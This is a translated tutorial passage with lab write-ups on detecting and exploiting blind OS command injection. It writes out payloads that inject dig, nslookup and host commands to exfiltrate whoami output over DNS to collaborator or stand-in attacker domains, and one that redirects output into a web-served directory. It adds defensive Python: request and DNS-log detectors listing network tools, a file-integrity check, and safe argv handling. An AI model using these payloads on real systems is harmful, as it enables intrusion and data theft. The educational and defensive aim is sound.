OS command injection vulnerabilities (Part 3)

Tram Ho

II. Analysis and exploitation of OS command injection vulnerabilities (continued)

6. Checking for blind OS command injection vulnerabilities with the out-of-band technique (OAST)

The time-delay method described above can give wrong or ambiguous results, because the measured delay is affected by many factors such as network speed and the asynchronous response behaviour of the system. We need a more “certain” method.

The idea is to make the target create an “interaction” with some other “place” that we control, so that the interaction itself is the indicator. To do this, we inject a shell command into the target that performs a DNS lookup for a domain on which we are allowed to observe incoming requests. The Burp Collaborator feature (in Burp Suite Professional) meets this need completely: it has a public IP address and its own private domain, and it runs a DNS service that resolves names under that domain to the corresponding IP address and records each lookup. Every interaction first reaches the DNS service, which is why a DNS packet always arrives before any HTTP or HTTPS packets.

Normally, when attacking a target there is only a back-and-forth exchange between us and the target, with no third system involved; this can be thought of as a completely “closed” process. When a third party is involved to support the exploit, it is called an out-of-band attack (OAST). We inject a payload whose job is to send a query to the Burp Collaborator URL; if the payload executes successfully, the target system creates an interaction with Burp Collaborator, and we can check for that interaction event. In short, a DNS lookup through Burp Collaborator lets us reliably confirm the existence of blind vulnerabilities hidden in the website. Commonly used commands in these cases include dig, nslookup, …

Lab analysis: Blind OS command injection with out-of-band interaction

Description: The website contains a blind command injection vulnerability in the user feedback functionality. The server executes a shell command with the user-supplied parameters, but the output is not displayed. To solve the lab, we need to perform a DNS lookup to Burp Collaborator to confirm the blind OS command injection vulnerability.

Check for the DNS lookup in the Submit feedback function using the dig command; injecting into the email parameter gives a successful response:

Payload: email=hacker%40gmail.com;dig+2uxow197tguhtquv3keggqawpnvpje.burpcollaborator.net

Other commands can also be used, such as nslookup:

Payload: email=hacker%40gmail.com||nslookup+9gqvi8vefngofxg2pr0n2xw3buhy5n.burpcollaborator.net||
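
From the defender’s side, the probes above leave a recognisable trace in the request itself: a shell separator followed by a command whose only purpose is to make outbound DNS traffic. The following Python is an added example, not code from the original post or from PortSwigger/Burp Suite, that scans URL-encoded form bodies for that pattern. The form field names, the list of OOB tools, the sample bodies and the oastify.com entry in the OAST domain list are assumptions; burpcollaborator.net is the only domain taken from the page.

```python
import re
from urllib.parse import unquote_plus

# Shell separators and substitution openers that let injected text start a
# new command.  The page's payloads use ";" and "||".
SEPARATOR_RE = re.compile(r"\|\||&&|\$\(|[;|&`]")

# Commands whose only purpose in an injected payload is to generate outbound
# DNS/HTTP traffic towards a server the tester controls (assumed list).
OOB_TOOLS = {"dig", "nslookup", "host", "ping", "curl", "wget"}

# Known public OAST service domains: burpcollaborator.net is the one used on
# the page, oastify.com is Burp Collaborator's newer default.
OAST_DOMAINS = ("burpcollaborator.net", "oastify.com")

# Separators or quoting that may trail the hostname, e.g. the closing "||".
TRAILING_JUNK_RE = re.compile(r"""[;|&`)'"\s]+$""")


def split_body(body):
    """Split a URL-encoded form body into decoded (name, value) pairs.

    We split on '&' ourselves instead of using urllib.parse.parse_qs: older
    Python versions also treat ';' as a pair separator, which would cut the
    injected ';dig ...' off the email value and hide it from the check.
    """
    pairs = []
    for part in body.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyse_value(name, value):
    """Return a finding if the value looks like an OOB injection probe, else None."""
    sep = SEPARATOR_RE.search(value)
    if sep is None:
        return None
    # Everything after the first separator is the would-be injected command.
    tokens = value[sep.end():].split()
    if not tokens or tokens[0] not in OOB_TOOLS:
        return None
    hostname = TRAILING_JUNK_RE.sub("", tokens[1]).lower() if len(tokens) > 1 else ""
    first_label = hostname.split(".")[0]
    return {
        "parameter": name,
        "separator": sep.group(),
        "tool": tokens[0],
        "hostname": hostname,
        "oast_domain": hostname.endswith(OAST_DOMAINS),
        # OAST services hand out a long opaque per-test label; a plain word in
        # that position (e.g. "whoami") points at data exfiltration instead.
        "opaque_label": len(first_label) >= 20 and first_label.isalnum(),
    }


def scan_body(body):
    """Scan one request body and return all findings (empty list when clean)."""
    return [f for f in (analyse_value(n, v) for n, v in split_body(body)) if f]


# Constructed request bodies for the lab's Submit feedback form (not captured
# traffic): one benign, one with an encoded '&' in free text, two probes that
# mirror the page's payloads.
SAMPLE_BODIES = [
    "csrf=abc123&name=Alice&email=alice%40example.com&subject=Hi&message=Thanks",
    "csrf=abc123&name=Bob&email=bob%40example.com&subject=Hi&message=Thanks+%26+regards",
    "csrf=abc123&name=x&email=hacker%40gmail.com;dig+2uxow197tguhtquv3keggqawpnvpje.burpcollaborator.net&subject=x&message=x",
    "csrf=abc123&name=x&email=hacker%40gmail.com||nslookup+9gqvi8vefngofxg2pr0n2xw3buhy5n.burpcollaborator.net||&subject=x&message=x",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for finding in scan_body(body):
            print(finding)
```

The second sample body shows why the check keys on “separator followed by a network tool” rather than on the separator alone: a literal ampersand in free text is common and must not page anyone.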

7. Exploiting blind OS command injection vulnerabilities with the out-of-band (OAST) technique

You may be wondering whether the out-of-band technique (OAST) is only good for confirming that this type of vulnerability exists: given the “blind” nature of the vulnerability, how can sensitive information and data be extracted? Don’t worry, the out-of-band technique can also help us extract information and sensitive data from the target. Indeed, consider the following payload:

& nslookup whoami.kgji2ohoyw.web-attacker.com &

The command performs a DNS lookup for a name under kgji2ohoyw.web-attacker.com in which the result of the whoami command is embedded as a label, so the attacker’s DNS server receives a query for:

wwwuser.kgji2ohoyw.web-attacker.com

Lab analysis: Blind OS command injection with out-of-band data exfiltration

Description: The website contains a blind command injection vulnerability in the user feedback functionality. The server executes a shell command with the user-supplied parameters, but the output is not displayed. To solve the lab, we need to execute the whoami command and exfiltrate its output through a DNS query to Burp Collaborator.

Confirm the DNS lookup in the Submit feedback function using the dig command; injecting into the email parameter gives a successful response:

Payload: email=hacker%40gmail.com||dig+c6jy8blh5q6r5065fuqqs0m61x72vr.burpcollaborator.net||

Extract the whoami command result via a DNS query to Burp Collaborator:

  • Payload 1: email=hacker%40gmail.com||host+whoami.c6jy8blh5q6r5065fuqqs0m61x72vr.burpcollaborator.net||

  • Payload 2: email=hacker%40gmail.com||nslookup+whoami.br6xta6gqprqqzr40tbpdz75mwsnib7.burpcollaborator.net||
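
Because the exfiltrated value travels as a DNS label, the resolver log of the web tier is where a defender sees sections 6 and 7 happen. This added Python example (not from the original post or from Burp Suite) reads constructed resolver log lines, ignores domains the web tier is expected to resolve, and for everything else separates the opaque per-test token from the labels in front of it, which is where command output such as whoami or wwwuser would sit. The log line format, the EXPECTED_DOMAINS allowlist and the token heuristic are assumptions; the three odd query names are the ones the page’s payloads would produce.

```python
import re

# Constructed resolver log for the web tier (not from the page):
# "<timestamp> <client-ip> <qtype> <qname>".
DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.12 A api.payments.example
2024-05-01T10:00:02Z 10.0.0.12 A cdn.example.net
2024-05-01T10:01:10Z 10.0.0.12 A 2uxow197tguhtquv3keggqawpnvpje.burpcollaborator.net
2024-05-01T10:02:30Z 10.0.0.12 A whoami.c6jy8blh5q6r5065fuqqs0m61x72vr.burpcollaborator.net
2024-05-01T10:02:31Z 10.0.0.12 A wwwuser.kgji2ohoyw.web-attacker.com
2024-05-01T10:03:00Z 10.0.0.12 A api.payments.example
"""

# Domains the web tier has a legitimate reason to resolve (assumed allowlist).
# A web server that suddenly resolves anything else is the primary signal.
EXPECTED_DOMAINS = {"payments.example", "example.net"}

# Heuristic for an OAST per-test token: 10+ lowercase alphanumerics that mix
# letters and digits.  Real words ("whoami", "wwwuser") do not match.
TOKEN_RE = re.compile(r"^(?=.*[a-z])(?=.*\d)[a-z0-9]{10,}$")


def registered_domain(labels):
    # Simplification for the example: the last two labels.  Production code
    # should use the Public Suffix List so that e.g. example.co.uk is one domain.
    return ".".join(labels[-2:])


def analyse_name(qname):
    """Split a queried name into base domain, token presence and the labels in
    front of the token, which is where redirected command output would sit."""
    labels = qname.lower().rstrip(".").split(".")
    sub = labels[:-2]
    token_positions = [i for i, label in enumerate(sub) if TOKEN_RE.match(label)]
    data = ".".join(sub[:token_positions[0]]) if token_positions else ""
    return {
        "base": registered_domain(labels),
        "has_token": bool(token_positions),
        "exfil_candidate": data,
    }


def detect(log_text, expected=EXPECTED_DOMAINS):
    """Return one alert per query to a domain outside the allowlist."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname = line.split()
        info = analyse_name(qname)
        if info["base"] in expected:
            continue
        alerts.append({"time": ts, "client": client, "qtype": qtype, "qname": qname, **info})
    return alerts


if __name__ == "__main__":
    for alert in detect(DNS_LOG):
        print(alert)
```

Reading the alerts in order reproduces the page’s story from the other side: a bare token (the section 6 probe), then whoami in front of a token (the command name the tester chose), then wwwuser (the value that actually left the server).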

8. Exploiting blind OS command injection vulnerabilities by redirecting output into another directory

We can “redirect” the output of the injected payload into a file in a directory under the web root where we have write permission, and then retrieve the file with the browser to read the output. For example, suppose the system’s static resources (images) are stored in the /var/www/static/images directory and are served to us as static content. If the system allows the user to write data into this directory, we can execute the following payload:

& whoami > /var/www/static/images/whoami.txt &

The above shell command writes the result of the whoami command to the file whoami.txt in the /var/www/static/images directory. We can then open the URL https://vulnerable-website.com/images/whoami.txt to read the output.

Lab analysis: Blind OS command injection with output redirection

Description: The website contains a blind command injection vulnerability in the user feedback functionality. The server executes a shell command with the user-supplied parameters, but the output is not displayed. In addition, we can write data into the /var/www/images/ directory. To solve the lab, we need to exploit the vulnerability to execute the whoami command and obtain the current username on the server.

As in the previous lab, confirm the DNS lookup in the Submit feedback function; the injection through the email parameter executes successfully:

We have write permission in the /var/www/images/ directory, so we first create a file hacker.txt with the touch command:

Next, write some content into hacker.txt:

Open the file hacker.txt in the browser to check whether the content is displayed:

The content is displayed successfully, so we can use the whoami command to write the current username into the hacker.txt file:

Lab completed!

Alternatively, instead of writing and reading data in the /var/www/images directory, we can send the data out as a hostname lookup against the Burp Collaborator domain.

Payload: email=hacker%40gmail.com||host+whoami.z11l3yg40d1e0n1sahldnnhtwk2lqa.burpcollaborator.net||
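
The redirection trick in this section leaves an artefact on disk: a new, non-image file in a directory that should only ever change through deployments. A simple control is to baseline the static directory and diff it on a schedule. The following Python is an added example (not code from the original post or the lab); it builds a throwaway images directory so it can run offline, and the extension allowlist, file names and file contents are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path

# File types that belong in a static images directory (assumed allowlist).
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".svg", ".webp"}


def build_manifest(root):
    """Map each file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(baseline, current, allowed_ext=ALLOWED_EXT):
    """Diff two manifests.  A new or modified file in a directory the web
    server only serves, or any file with a non-image extension, is reported."""
    findings = []
    for rel, digest in current.items():
        if rel not in baseline:
            findings.append(("new_file", rel))
        elif baseline[rel] != digest:
            findings.append(("modified", rel))
        if Path(rel).suffix.lower() not in allowed_ext:
            findings.append(("disallowed_extension", rel))
    findings.extend(("deleted", rel) for rel in baseline if rel not in current)
    return sorted(findings)


def demo():
    """Build a throwaway images directory, take a baseline, then reproduce the
    kind of artefact the page's redirection payload leaves behind and diff again."""
    with tempfile.TemporaryDirectory() as tmp:
        images = Path(tmp) / "images"
        images.mkdir()
        (images / "logo.png").write_bytes(b"\x89PNG constructed sample")
        (images / "banner.jpg").write_bytes(b"\xff\xd8 constructed sample")
        baseline = build_manifest(images)
        # Artefacts a scheduled run would catch: a dropped text file and a
        # tampered image.  Values are constructed, not copied from a server.
        (images / "whoami.txt").write_text("wwwuser\n")
        (images / "logo.png").write_bytes(b"replaced content")
        return compare(baseline, build_manifest(images))


if __name__ == "__main__":
    for kind, path in demo():
        print(f"{kind}: {path}")
```

In a real deployment the baseline is taken at release time and stored outside the web root, so that the same write permission that let the file be dropped cannot also rewrite the manifest.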

III. Measures to prevent OS command injection vulnerabilities

The best way to prevent this vulnerability is to completely eliminate the use of shell commands during the product’s operation, replacing them with APIs that have been proven to be safe and secure. When a system cannot avoid passing user input into shell commands, some of the following prevention measures can be taken:

  • Strictly validate user input: remove all unnecessary special characters and require the input to match a specific regular expression.
  • Use a combination of blacklist and whitelist filtering of keywords.
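
The two recommendations above, in code. This added Python example (not from the original post) contrasts the vulnerable pattern of building one string for a shell with the hardened pattern: an allowlist regular expression for the email field, a blocklist check for the separators used on this page as defence in depth only, and an argv list handed to the child process without any shell. The /opt/feedback/notify.sh path is a hypothetical placeholder, and echo_argument_without_shell uses the Python interpreter as a stand-in child to show that a payload passed as one argument is printed back literally rather than interpreted.

```python
import re
import shlex
import subprocess
import sys

# Allowlist pattern for the feedback form's email parameter.  Anything outside
# it (including ';', '|', '&', whitespace) is rejected before a command is built.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$")

# Blocklist check: catches the characters the page's payloads rely on, but it
# is defence in depth only; the allowlist is what actually bounds the input.
SHELL_METACHARS = set(";|&`$()<>\n\r\"'\\")

# Hypothetical notification script (placeholder path, not a real tool).
NOTIFY_SCRIPT = "/opt/feedback/notify.sh"


def unsafe_command(email):
    """VULNERABLE pattern: user input concatenated into a string that a shell
    will parse, so ';', '||' or '&' in `email` start a second command.
    Returned rather than executed so the example stays safe to run."""
    return f"{NOTIFY_SCRIPT} {email}"


def contains_shell_metachars(value):
    return any(ch in SHELL_METACHARS for ch in value)


def validate_email(email):
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("email rejected by allowlist")
    return email


def is_accepted(email):
    try:
        validate_email(email)
        return True
    except ValueError:
        return False


def safe_argv(email):
    """HARDENED pattern: strict allowlist validation, then an argv list that is
    passed straight to exec (no shell), so separators are never interpreted."""
    return [NOTIFY_SCRIPT, validate_email(email)]


def argv_preview(argv):
    """What the argv list would look like if it had to go through a shell:
    shlex quotes each element, showing a payload would stay one argument."""
    return shlex.join(argv)


def echo_argument_without_shell(value):
    """Hand the raw value to a child process as a single argv element with no
    shell involved.  The child prints it back unchanged: nothing after ';' or
    '||' runs.  The Python interpreter stands in for the real program."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


if __name__ == "__main__":
    probe = "hacker@gmail.com;dig x.burpcollaborator.net"
    print("shell string:", unsafe_command(probe))
    print("allowlist accepts probe:", is_accepted(probe))
    print("argv, if shown to a shell:", argv_preview([NOTIFY_SCRIPT, probe]))
    print("child received:", echo_argument_without_shell(probe))
```

The order of the defences matters: validation rejects the probe outright, and even if a future change loosened the pattern, the argv list means the worst outcome is a notification sent to an odd-looking address, not a second command.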

Source : Viblo